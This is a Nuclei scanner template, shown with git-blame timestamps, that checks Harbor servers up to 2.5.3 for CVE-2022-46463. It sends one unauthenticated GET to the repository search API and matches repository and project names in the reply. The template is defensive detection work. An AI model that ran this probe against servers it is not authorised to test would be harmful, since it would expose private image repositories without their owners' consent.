nuclei-templates/http/cves/2022/CVE-2022-46463.yaml

34 lines
756 B
YAML
Raw Normal View History

2023-08-16 08:46:20 +00:00
id: CVE-2022-46463
info:
name: Harbor <=2.5.3 - Unauthorized Access
author: Arm!tage
severity: high
description: An access control issue in Harbor v1.X.X to v2.5.3 allows attackers to access public and private image repositories without authentication.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-46463
metadata:
max-request: 1
vendor: linuxfoundation
product: harbor
tags: cve,cve2022,intrusive,harbor
http:
- method: GET
path:
2023-08-16 08:57:23 +00:00
- '{{BaseURL}}/api/v2.0/search?q=/'
2023-08-16 08:46:20 +00:00
matchers-condition: and
matchers:
- type: word
2023-08-16 08:57:23 +00:00
part: response
2023-08-16 08:46:20 +00:00
words:
2023-08-16 08:57:23 +00:00
- 'repository_name'
- 'project_name'
condition: and
2023-08-16 08:46:20 +00:00
- type: status
status:
2023-08-16 08:57:23 +00:00
- 200